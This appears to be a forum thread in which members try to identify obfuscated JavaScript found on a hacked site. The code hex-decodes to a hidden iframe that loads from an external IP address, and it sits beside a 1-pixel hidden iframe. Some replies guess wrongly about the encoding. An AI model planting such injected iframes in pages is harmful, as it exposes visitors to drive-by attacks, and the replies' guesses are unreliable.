What do you make of this?

Questions about programming languages and debugging
Post Reply
User avatar
CommonStray
Forum Assassin
Forum Assassin
Posts: 1215
Joined: 20 Aug 2005, 16:00
18

What do you make of this?

Post by CommonStray »

What do you guys make of this?

Code: Select all

iframe src='http://url' width='1' height='1' style='visibility: hidden;'  /iframe

<---script>

function v475e59178e2f2(v475e59178e6da){ 

var v475e59178eac0=16; 
return(parseInt(v475e59178e6da,v475e59178eac0)); 

}

function v475e59178f294(v475e59178f678) {  

var v475e59178fa6a='';

for(v475e59178feb8=0; 

v475e59178feb8<v475e59178f678.length; v475e59178feb8+=2)

{ v475e59178fa6a+=(String.fromCharCode(v475e59178e2f2(v475e59178f678.substr(v475e59178feb8, 2))));

}

return v475e59178fa6a; } 

document.write(v475e59178f294('3C5343524950543E77696E646F772E73
74617475733D27446F6E65273B646F63756D656E742E777269746528273C
696672616D65206E616D653D6261326238207372633D5C27687474703A2
F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272
4D6174682E726F756E64284D6174682E72616E646F6D28292A313632343
330292B276564613738666366665C272077696474683D333730206865696
768743D343339207374796C653D5C27646973706C61793A206E6F6E655C
273E3C2F696672616D653E27293C2F5343524950543E'));

<----/script>
had to get rid of some brackets to post the code, looks to me like an iframe XSS of some sort...possibly something to get data while open, password manager stuff perhaps ? dunno, buddy of mine i guess his crap got hacked or something now he has this, just shoot me thoughts...
Top
bubzuru
.net coder
.net coder
Posts: 700
Joined: 17 Apr 2007, 16:00
17
Contact:
Contact bubzuru

Post by bubzuru »

or maybe it is CSRF

check this
http://www.suck-o.com/modules.php?name= ... pic&t=4025

on one of the videos the guy says that the hacker encodes the exploit
watch Advanced Web Application and Database Threat Analysis with MatriXay
for more info :)
Top
User avatar
bad_brain
Site Owner
Site Owner
Posts: 11636
Joined: 06 Apr 2005, 16:00
19
Location: In your eye floaters.
Contact:
Contact bad_brain

Post by bad_brain »

ohhh.....I had such code in a Wordpress template already...it's encrypted code like bubzuru said (using either md5 or the php crypt(); function)m so you can't edit it too easy. in the template I had it was used to display some crappy links....so actually it can be anything.... :-k but the 1-pixel iframe thingy looks pretty strange, could be a cookie stealer or sth like that...
Top
User avatar
Gogeta70
^_^
^_^
Posts: 3275
Joined: 25 Jun 2005, 16:00
18

Post by Gogeta70 »

It looks like a lot of hex code...
¯\_(ツ)_/¯ It works on my machine...
Top
User avatar
Big-E
Administrator
Administrator
Posts: 1332
Joined: 16 May 2007, 16:00
16
Location: IN UR ____ , ____ING UR _____ .
Contact:
Contact Big-E

Post by Big-E »

gogeta70 wrote:It looks like a lot of hex code...
naw started to try and decode it, doesn't make sense if it's hex.
Top
User avatar
CommonStray
Forum Assassin
Forum Assassin
Posts: 1215
Joined: 20 Aug 2005, 16:00
18

Post by CommonStray »

the iframe def. grabs data from the browser, there isnt any doubt in my mind

like

Code: Select all

window.status='Done';document.write('iframe name=blah blah src=\'address+Math(Math.random()* number')
who knows, i guess my buddy kinda got it figured out, he;ll be alright, i just wish he'd stop asking me to crack shit for him and identify what type of encryption something is on :roll:
Top
User avatar
DNR
Digital Mercenary
Digital Mercenary
Posts: 6114
Joined: 24 Feb 2006, 17:00
18
Location: Michigan USA
Contact:
Contact DNR

web bug

Post by DNR »

the 1x1 pixel is a web-bug, remember any time your computer has to access a server - in this case, for a 'invisible' img src - your IP is logged on that server. Server side exploits can then take over from there, such as grepping OS, browser type/ver, or locating a specific file..
as far as what this author is doing, I don't know. :-k
iframe src='http://url' width='1' height='1' style='visibility: hidden;' /iframe
-
He gives wisdom to the wise and knowledge to the discerning. He reveals deep and hidden things; he knows what lies in Darkness, and Light dwells with him.
Top
Post Reply

Return to “Coding”